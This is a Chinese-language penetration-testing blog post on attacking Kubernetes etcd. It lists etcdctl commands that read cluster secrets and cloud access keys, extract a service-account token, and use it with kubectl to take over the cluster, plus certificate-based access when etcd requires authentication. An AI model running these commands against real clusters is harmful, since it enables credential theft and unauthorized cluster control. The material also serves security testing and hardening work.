cdxy.me
Cyber Security / Data Science / Trading

K8s渗透测试etcd的利用

[Penetration Testing]

2020-06-17 18:21:07 cdxy K8s,etcd,未授权访问

ETCD

etcd:k-v数据库,用于保存K8s集群数据,在配置错误/搭配SSRF利用时,访问到etcd=接管集群。位于K8s master node 对内暴露2379端口,本地127.1可免认证访问,其他地址要带--endpoint参数和cert进行认证。

文档

  • https://kubernetes.io/zh/docs/concepts/overview/components/
  • https://etcd.io/docs/

未授权访问的情况

ETCD V2和V3是两套不兼容的API,K8s用V3,通过环境变量设置API V3: 

export ETCDCTL_API=3

检查是否正常连接 

etcdctl endpoint health 

127.0.0.1:2379 is healthy: successfully committed proposal: took = 939.097µs

查看K8s secrets

etcdctl get / --prefix --keys-only | grep /secrets/

获取集群中保存的云产品AK,横向移动:

etcdctl get /registry/secrets/default/acr-credential-518dfd1883737c2a6bde99ed6fee583c

读取service account token 

etcdctl get / --prefix --keys-only | grep /secrets/kube-system/clusterrole

在返回值末尾取 ey开始到#kubernetes.io/service-account-token末尾#之前的这部分:

通过token认证访问API-Server,接管集群: 

kubectl --insecure-skip-tls-verify -s https://127.0.0.1:6443/ --token="[ey...]" -n kube-system get pods

需要认证的情况

尝试读取etcd数据

etcdctl get / --prefix --keys-only
Error: dial tcp 127.0.0.1:2379: getsockopt: connection refused

结果返回本地2379连接失败,netstat看下发现监听的是172段,这种情况下需要指定endpoint带cert进行访问,认证失败会返回Error: context deadline exceeded

[root@iZbp13l0dv5x8ke1jmrpihZ cert]# netstat -antp | grep LISTEN
tcp        0      0 127.0.0.1:10248         0.0.0.0:*               LISTEN      2917/kubelet
tcp        0      0 127.0.0.1:10249         0.0.0.0:*               LISTEN      4801/kube-proxy
tcp        0      0 172.16.0.112:2379       0.0.0.0:*               LISTEN      3222/etcd
tcp        0      0 172.16.0.112:2380       0.0.0.0:*               LISTEN      3222/etcd
tcp        0      0 127.0.0.1:10253         0.0.0.0:*               LISTEN      4628/cloud-controll
tcp        0      0 127.0.0.1:10257         0.0.0.0:*               LISTEN      4134/kube-controlle
tcp        0      0 127.0.0.1:10259         0.0.0.0:*               LISTEN      4150/kube-scheduler
tcp        0      0 127.0.0.1:33941         0.0.0.0:*               LISTEN      2917/kubelet
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      3465/sshd

带cert访问etcd

[root@iZbp13l0dv5x8ke1jmrpihZ cert]# ls
172.16.0.112-name-1.csr      172.16.0.114-name-3.csr      ca.pem               etcd-server.pem
172.16.0.112-name-1-key.pem  172.16.0.114-name-3-key.pem  etcd-client.csr      peer-ca-config.json
172.16.0.112-name-1.pem      172.16.0.114-name-3.pem      etcd-client-key.pem  peer-ca.csr
172.16.0.113-name-2.csr      ca-config.json               etcd-client.pem      peer-ca-key.pem
172.16.0.113-name-2-key.pem  ca.csr                       etcd-server.csr      peer-ca.pem
172.16.0.113-name-2.pem      ca-key.pem                   etcd-server-key.pem
[root@iZbp13l0dv5x8ke1jmrpihZ cert]# etcdctl --insecure-skip-tls-verify --insecure-transport=true --endpoints=https://172.16.0.112:2379 --cacert=ca.pem --key=etcd-client-key.pem --cert=etcd-client.pem endpoint health
https://172.16.0.112:2379 is healthy: successfully committed proposal: took = 2.084526ms